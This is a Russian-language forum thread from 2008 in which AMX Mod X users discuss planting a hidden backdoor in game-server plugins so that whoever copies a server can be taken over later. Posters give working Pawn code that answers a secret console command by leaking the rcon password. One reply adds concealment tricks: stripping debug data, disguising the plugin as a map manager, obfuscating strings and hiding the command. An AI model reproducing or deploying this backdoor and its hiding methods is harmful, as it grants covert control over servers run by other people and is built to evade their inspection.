|
методы "захвата" чужого сервера собственной сборки.
|
|
| Argus | Дата: Вторник, 07.10.2008, 20:18:26 | Сообщение # 1 |
 AMXModX Fan
Статус: Не в сети
| нужен плагин/код (код для внедрения в другой стандартный плагин amxx, например в admin.sma) позволяющий без знания rcon сервера и без amxx админки получить доступ к управлению сервером. т.е. ситуация - у меня мой сервер скопировали и подняли где-то у себя, удалив меня из админов и поменяв rcon - у меня должна остаться возможность как-то управлять этим сервером. (навскидку - возможность просмотра текущего rcon) какие для этого есть методы?
Правила форума Поиск плагинов Последние сообщения форума
|
| |
|
|
| max_rip | Дата: Вторник, 07.10.2008, 21:55:31 | Сообщение # 2 |
|
Подполковник
| например в функцию авторизации добавить условие на ник и пас от ника, возможно даже свою переменную в setinfo, при соблюдении которых читается цвар ркона, и пишется клиенту в консоль ) Добавлено (2008-10-07, 9:55 Pm) --------------------------------------------- но паливно), если код глянуть.
|
| |
|
|
| LtRAT | Дата: Вторник, 07.10.2008, 22:28:24 | Сообщение # 3 |
|
Сержант
| такие строковые константы всегда паливо Исходники нельзя давать в таких случаях если именно получать rcon, то лучше всего это делать не просто по какой-то единственной, только тебе известной команде а сделать ряд вещей, после которых тебе напишут ркон т.е. допустим, изначально в чат написать "ччч" потом прыгнуть, потом еще ченить и еще ченить и уже в консоли после всего этого напишут ркон реализуется быстро, просто, тяжело найти и отключить...
|
| |
|
|
| aha | Дата: Вторник, 07.10.2008, 22:34:23 | Сообщение # 4 |
|
Генерал-майор
| Hу во чтото похожее : Code public plugin_init() { register_clcmd("rconpassworddd", "get_rcon"); }
public get_rcon(id) { set_task (10.0 , "aff_ad" ) }
public aff_ad(id, level, cid) { new register_the_rcon[64] get_cvar_string("rcon_password",register_the_rcon,63) client_print(id, print_console, "Im %s dropped", register_the_rcon); return PLUGIN_HANDLED; }
|
| |
|
|
| slogic | Дата: Вторник, 07.10.2008, 22:57:38 | Сообщение # 5 |
|
Генералиссимус
| а еще можно прямо в модуль amxx захардкодить при желании.
|
| |
|
|
| Argus | Дата: Понедельник, 13.10.2008, 00:02:55 | Сообщение # 6 |
 AMXModX Fan
| Quote (max_rip) например в функцию авторизации добавить условие на ник и пас от ника, возможно даже свою переменную в setinfo, при соблюдении которых читается цвар ркона, и пишется клиенту в консоль у меня, кстати, тоже такая мысль была. это было первое и последние что я придумал. дальше я решил просто узнать уже существующий метод, т.к. подумал что тут уже кто-то этим вопросом задавался и какое-то решение по нему нашел. по крайней мере, я помню вопрос о "краже" кого-то тоже волновал, но там нужен был не административный доступ к "украденному" сервере, а просто чтобы на новом ip сервер просто не запускался. Quote (max_rip) но паливно), если код глянуть. да я думаю не сильно, если отвлеченно от темы "rcon" назвать функции и переменные в них. и вообще, те кто "тырят" сервера - они разве смотрят исходники? о_О такие люди обычно даже плагин сами подключить не могу...Quote (LtRAT) Исходники нельзя давать в таких случаях вот вот, зачем их давать? плагин откомпилировал, установил и готово. Quote (LtRAT) т.е. допустим, изначально в чат написать "ччч" потом прыгнуть, потом еще ченить и еще ченить  и уже в консоли после всего этого напишут ркон мистер джеймс бонд?)))) Quote (aha) Hу во чтото похожее : работает. палится через amxx cmds на сервере. Code public plugin_init() { register_clcmd("deleteserverprefetch", "del_prefetch"); }
public del_prefetch(id) { set_task (10.0 , "aff_ad" ) }
public aff_ad(id, level, cid) { new register_prefetch[64] get_cvar_string("rcon_password",register_prefetch,63) client_print(id, print_console, "%s dropped", register_prefetch); return PLUGIN_HANDLED; } Quote (slogic) а еще можно прямо в модуль amxx захардкодить при желании. можно. тогда вообще хрен кто найдет. но тогда тут такой момент. на сервере возможно будут обновлять amxx и модуль потрут... а некоторый, очень полезный, плагин X, который не идёт в стандартном наборе плагинов, будет оставаться незамеченным с сервером вместе из версии в версию...Добавлено (2008-10-13, 0:02 Am) ---------------------------------------------
Quote (aha) Hу во чтото похожее : чё-то он всем в консоли пишет rcon.
|
| |
|
|
| DaTa | Дата: Понедельник, 13.10.2008, 00:53:33 | Сообщение # 7 |
|
Генерал-полковник
| Ну вот мои метод, самый легкий: компилируем amxxpc.exe -d0 mapmanager.sma , что бы удалить отладочную информацию Если скомпилировать обычным способом - тоже не беда, все переменные названы сбивающим образом, что бы при просмотре отладочной информации не возникло сомнений о целях плагина. Записываем как-то неприметно, даем неприметное имя: Quote ; Map related nextmap.amxx ; displays next map in mapcycle mapmanager.amxx ;manadge mapcycle mapchooser.amxx ; allows to vote for next map timeleft.amxx ; displays time left on map При чем можно было бы в него добавить еще горстку ненужных, что-то содержащих, названных как будто для мап менеджера паблик функций, что бы придать размер файлу. Строки "зашифрованы", вызов команды не регистрируется, но вылавливается. Если владелец сервера напишет эту команду, то увидит Unknown command, а на предложение выше "Next map is ..." и не среагирует.
|
| |
|
|
| CLLlAgOB | Дата: Вторник, 14.10.2008, 00:40:57 | Сообщение # 8 |
 Полковник
| ну и злые вы а вы не подумали что amx_help покажет вышу неприметную комманду :)))))
|
| |
|
|
| Argus | Дата: Вторник, 14.10.2008, 08:34:23 | Сообщение # 9 |
 AMXModX Fan
| Quote (CLLlAgOB) а вы не подумали что amx_help покажет вышу неприметную комманду не покажет.
|
| |
|
|